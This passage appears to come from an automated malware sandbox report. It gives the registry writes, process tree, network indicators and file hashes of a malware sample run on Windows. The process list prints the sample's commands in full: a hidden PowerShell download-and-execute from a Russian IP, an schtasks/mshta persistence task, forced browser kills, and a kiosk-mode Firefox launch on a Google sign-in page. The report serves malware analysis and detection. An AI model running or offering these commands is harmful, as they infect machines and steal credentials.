| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
"C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
"C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"
C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"
C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1020
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
"C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"
C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe
"C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe
"C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1204
C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe
"C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"
C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe
"C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab
C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe
"C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"
C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500
C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 1032
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.80.1:443 | croprojegies.run | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| N/A | 127.0.0.1:49503 | tcp | |
| N/A | 127.0.0.1:49510 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.179.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r3---sn-aigl6n6s.gvt1.com | udp |
| GB | 173.194.3.72:443 | r3---sn-aigl6n6s.gvt1.com | tcp |
| US | 8.8.8.8:53 | r3.sn-aigl6n6s.gvt1.com | udp |
| US | 8.8.8.8:53 | r3.sn-aigl6n6s.gvt1.com | udp |
| GB | 173.194.3.72:443 | r3.sn-aigl6n6s.gvt1.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta
| MD5 | 2b2ae07bb23617f2f0d316dcce383b8c |
| SHA1 | 839721c2ad4a73cfcf76f2514a0b7505008a6f1a |
| SHA256 | e62d1fe3098e2a44c13f031271badc86fa075eb0d17c7b7814b43679c4bab7ae |
| SHA512 | 2c281088e14d3ce4d07dd821ddfaf6d0275650bc2845d933bef54c9ba3d28caa6a62b9aa13bc7d06d5a303f341325759065eb35156296d7cbda850b6f96a025b |
C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
| MD5 | b5db83c03a37b4cd4746a6080133e338 |
| SHA1 | edf3f7e5c3bda89e1382df8f7d0443783426c834 |
| SHA256 | 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df |
| SHA512 | e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313 |
memory/2084-13-0x00000000064D0000-0x000000000698F000-memory.dmp
memory/3068-14-0x0000000000FB0000-0x000000000146F000-memory.dmp
memory/2352-30-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/3068-28-0x0000000000FB0000-0x000000000146F000-memory.dmp
memory/2352-32-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/2352-33-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
| MD5 | d054bcb257edeee50293394229ab1c67 |
| SHA1 | 80f84013bdc91aa820a0534a297be285e9f0c9f8 |
| SHA256 | b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e |
| SHA512 | ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26 |
memory/2352-49-0x0000000006790000-0x0000000007192000-memory.dmp
memory/2352-51-0x0000000006790000-0x0000000007192000-memory.dmp
memory/3044-50-0x00000000012E0000-0x0000000001CE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/984-65-0x0000000000BD0000-0x0000000000C48000-memory.dmp
memory/1548-70-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-74-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-79-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-78-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1548-76-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-72-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-68-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1548-81-0x0000000000400000-0x0000000000465000-memory.dmp
memory/2352-87-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/2352-93-0x0000000006790000-0x0000000007192000-memory.dmp
memory/3044-94-0x00000000012E0000-0x0000000001CE2000-memory.dmp
memory/3044-95-0x00000000012E0000-0x0000000001CE2000-memory.dmp
memory/2352-96-0x0000000006790000-0x0000000007192000-memory.dmp
memory/1412-97-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1412-99-0x0000000000400000-0x000000000042F000-memory.dmp
memory/3044-98-0x00000000012E0000-0x0000000001CE2000-memory.dmp
memory/1412-103-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
| MD5 | 5d153f73ce1b6a907cf87ddb04ba12b2 |
| SHA1 | bfda9ee8501ae0ca60f8e1803efea482085bf699 |
| SHA256 | 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c |
| SHA512 | 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102 |
memory/2352-116-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/2352-123-0x0000000006790000-0x00000000073E1000-memory.dmp
memory/2352-124-0x0000000006790000-0x00000000073E1000-memory.dmp
memory/2552-125-0x0000000000A30000-0x0000000001681000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CXRG2YQS\service[1].htm
